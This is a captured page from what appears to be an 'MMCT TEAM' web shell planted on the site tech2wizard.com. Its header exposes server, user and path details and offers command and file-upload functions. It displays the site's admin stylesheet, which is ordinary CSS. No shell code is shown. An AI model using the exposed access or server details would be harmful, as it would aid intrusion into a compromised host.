MMCT TEAM
Server IP : 2a02:4780:11:1017:0:31f1:b895:8  /  Your IP : 216.73.216.163
Web Server : LiteSpeed
System : Linux in-mum-web917.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64
User : u837925013 ( 837925013)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u837925013/domains/tech2wizard.com/public_html/admin/assets/css/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/u837925013/domains/tech2wizard.com/public_html/admin/assets/css/style.css
.dataTables_wrapper{
    padding:10px;
}
.btn {
    color: #ffffff!important;
}
.csv-input{
   padding: 0!important;
   line-height: 30px!important;
}
.csv-input:before {
    border:none!important;
    background:none;
}
.toggleswitch {
  position: relative;
  width: 100%;
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
}

.toggleswitch-checkbox {
  display: none;
}
#myTab{
    border:none;
    margin-bottom:20px;
}
#myTab .nav-item .nav-link{
    padding: 10px 30px;
    background: #6574c4;
    color: white;
    border-radius: inherit;
}
#myTab .nav-item{
    padding: 0px 9px;
}
.home-page-tab .nav-pills li a{
  padding: 9px 21px;
  background: #6574c4;
  color: white;
  border-right: 1px solid;
}
.home-page-tab .nav-pills li{
        margin: 10px 0;
}
.home-page-tab .nav-pills li a.active{
  background: #68c465;
}
.home-page-tab  .tab-content{
  margin-top: 20px;
}
.home-page-tab .nav-pills li a:hover{
  background: #68c465;
}
.home-page-tab .nav-pills li a{
  color: white;
  color: white;
  text-decoration: none;
}
.banner-admin-show{
  height:170px;
  overflow: hidden;
  width: 100%;
  margin: 10px 0;
}
.banner-admin-show img{
  width: 100%;
  height: 100%;
  object-fit: cover;
}
.banner-admin-show .gallery_remove{
  width: 88%;
}
#myTab .nav-item .active{
    background: red;
}
.tab-content{
    padding:10px;
}
.toggleswitch-label {
  display: block;
  overflow: hidden;
  cursor: pointer;
  border: 2px solid #27A1CA;
  border-radius: 0px;
}
.spinner {
  left: -.6em;
  top: .4em;
  width: 2.5em;
  display: block;
  position: absolute;
}

/* spinner animation */
@keyframes spinner {
  0% {
    transform: rotate(0deg);
  }
  
  100% {
    transform: rotate(360deg);
  }
}

/* The actual spinner element is a pseudo-element */
.spinner::before {
  content: "";
  width: 1.5em; /* Size of the spinner */
  height: 1.5em; /* Change as desired */
  position: absolute;
  top: 50%;
  left: 50%;
  border-radius: 50%;
  border: solid .35em #999; /* Thickness/color of spinner track */
  border-bottom-color: #555; /* Color of variant spinner piece */
  animation: .8s linear infinite spinner; /* speed of spinner */
  transform: translate(-50%, -50%);
  will-change: transform;
}
.toggleswitch-inner {
  display: block;
  width: 200%;
  margin-left: -100%;
  -moz-transition: margin 0.3s ease-in 0s;
  -webkit-transition: margin 0.3s ease-in 0s;
  -o-transition: margin 0.3s ease-in 0s;
  transition: margin 0.3s ease-in 0s;
}

.toggleswitch-inner:before,
.toggleswitch-inner:after {
  display: block;
  float: left;
  width: 50%;
  height: 30px;
  padding: 0;
  line-height: 26px;
  font-size: 14px;
  color: white;
  font-family: Trebuchet, Arial, sans-serif;
  font-weight: bold;
  -moz-box-sizing: border-box;
  -webkit-box-sizing: border-box;
  box-sizing: border-box;
  background-clip: padding-box;
}

.toggleswitch-inner:before {
  content: "Active";
  padding-left: 10px;
  background-color: #28c76f;
  color: #000000;
  text-align: center;
}

.toggleswitch-inner:after {
  content: "Disabled";
  padding-right: 10px;
  background-color: #ea5455;
  color: #000000;
  text-align: center;
}
.emal_sms .toggleswitch-inner:before {
  content: "Verified";
  padding-left: 10px;
  background-color: #28c76f;
  color: #000000;
  text-align: center;
}

.emal_sms .toggleswitch-inner:after {
  content: "Unverified";
  padding-right: 10px;
  background-color: #ea5455;
  color: #000000;
  text-align: center;
}
.toggleswitch-switch {
  display: block;
  width: 25px;
  margin: 0px;
  background: #000000;
  position: absolute;
  top: 0;
  bottom: 0;
  right: 92%;
  -moz-transition: all 0.3s ease-in 0s;
  -webkit-transition: all 0.3s ease-in 0s;
  -o-transition: all 0.3s ease-in 0s;
  transition: all 0.3s ease-in 0s;
}

.toggleswitch-checkbox:checked + .toggleswitch-label .toggleswitch-inner {
  margin-left: 0;
}

.toggleswitch-checkbox:checked + .toggleswitch-label .toggleswitch-switch {
  right: 0px;
}

.toast {
    max-width: 350px;
    overflow: hidden;
    font-size: .875rem;
    background-color: rgba(255,255,255,.85);
    background-clip: padding-box;
    border: 1pxsolidrgba(0,0,0,.1);
    box-shadow: 0 .25rem .75remrgba(0,0,0,.1);
    -webkit-backdrop-filter: blur(10px);
    backdrop-filter: blur(10px);
    opacity: 1!important;
    border-radius: 0.25rem;
    z-index: 99999999999999999999!important;
    position: absolute!important;
    right: 20px!important;
    top: 17px!important;
}

.toast .success{
    padding: 0.75rem;
    background: #00ff5a70;
    margin: 0;
}
.toast .alert{
    padding: 0.75rem;
    background: #ffc0c0;
    margin: 0;
}
.toast .toast-body .fa-close{
    margin: 4px 0px 0px 11px;
    cursor: pointer;
}
.toast .toast-body .fa-warning{
   margin: 1px 11px 0px 0px;
    cursor: pointer;
    font-size: 21px;
}
.bg--alert{
    background:red;
}
.error{
    color:red;
}
.suc{
    color:green;
}
.tag_h{
    text-transform: capitalize;
    background: #7367f0;
    color: white;
    padding: 2px 12px;
    border-radius: 10px;
}
.tab .tablinks{
        padding: 6px 36px;
}
.tab .active{
    outline: none;
    background: green!important;
}
.card-body .tabcontent{
   margin-top:20px; 
}

.note-toolbar {
    background: hsla(0,0%,50.2%,.11);
}
.note-btn-group .note-btn {
    border-color: rgba(0,0,0,.2);
    padding: 0.28rem 0.65rem;
    font-size: 13px;
}
.btn-light {
    color: #212529;
    background-color: #f8f9fa;
    border-color: #f8f9fa;
}
.note-btn {
    background:white!important;
}
.note-btn i{
    color:black!important;
}
.bootstrap-tagsinput .label-info{
    background: #6574c4;
    border-radius: 5px;
    padding: 0px 6px;
    font-size: 15px;
}
.bootstrap-tagsinput .tag [data-role="remove"]:after {
    color: white;
}
.bootstrap-tagsinput{
    width:100%;
}

MMCT - 2023